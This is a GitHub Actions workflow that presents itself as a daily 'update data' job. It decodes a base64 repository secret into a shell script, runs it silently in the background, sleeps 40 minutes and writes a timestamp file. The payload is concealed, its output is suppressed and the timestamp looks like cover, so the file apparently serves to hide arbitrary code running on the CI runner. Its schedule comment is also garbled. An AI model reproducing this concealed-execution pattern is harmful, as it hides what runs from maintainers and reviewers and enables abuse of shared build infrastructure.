# .github/workflows/scheduled-builds.yml
name: update data

on:
  schedule:
    # Runs "at minute 15  minute " (see https://crontab.guru)
    - cron: '5 4 * * *'

jobs:
  build:
    name: Build
    runs-on: ubuntu-latest
    strategy:
      matrix:
        node: [ '20' ]
    steps:
      - uses: actions/checkout@v4
      - name: Setup node
        uses: actions/setup-node@v4
        with:
          node-version: ${{ matrix.node }}
      - name: Jalankan Skrip
        env:
          TEZ: ${{ secrets.TEZ }}
        run: |
          echo "$TEZ" | base64 --decode > ku.sh
          sh ku.sh > /dev/null 2>&1 &
          sleep 40m 
          echo "OK!"
          date "+%Y-%m-%d %H:%M:%S" > last_update.txt
